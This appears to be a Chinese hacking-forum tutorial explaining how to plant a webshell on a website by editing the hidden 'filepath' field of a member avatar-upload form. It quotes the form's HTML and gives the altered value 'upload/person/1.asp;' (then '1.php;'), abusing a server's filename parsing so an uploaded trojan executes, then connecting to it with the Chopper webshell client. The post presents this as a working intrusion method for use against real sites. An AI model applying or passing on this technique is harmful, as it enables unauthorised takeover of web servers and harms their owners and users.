修改上传POST拿SHELL

大家好！我是windsore  今天给大家带来个教程突破上传拿SHELL

OK 废话不多说开始吧  只是个普通会员登录你们随便注册个账户
上传头像  我们用另外个浏览器

我们查看源码

<td>
<input type="hidden" name="act" value="upload">
<input type="hidden" name="filepath" value="upload/person/">
<input name="photos" type="hidden" id="photos" value="yes" />
<input name="file" type="file" id="file" style="font-family: 宋体; font-size: 12px" size="38">
</td>
</tr>
<tr>
<td> <input type="button" name="Submit22" value="删除照片" onClick="location.href='?ac=delphoto';">
<input type="button" name="Submit2" value="屏蔽照片" onClick="location.href='?ac=keep&keepid=1';">
<input name="Send2" style="font-family: 宋体; font-size: 12px" type="submit" value="上传照片">
</td>

找到上传的这段代码

<input type="hidden" name="filepath" value="upload/person/">

upload/person/  这个是目录我们上传的图片都会到这个目录去  我们修改下上传就OK了   让他解析选择应用更改
OK啊  修改成upload/person/1.asp;   OK  木马已经上传成功  我们查看木马地址

用菜刀链接   悲哀出错  看样子还是要改成1.php;  OK  教程就做到这里  88 刚我的好东西来了
所以嘿咻去

(附件)

本帖包含的部分附件只能访问社区查看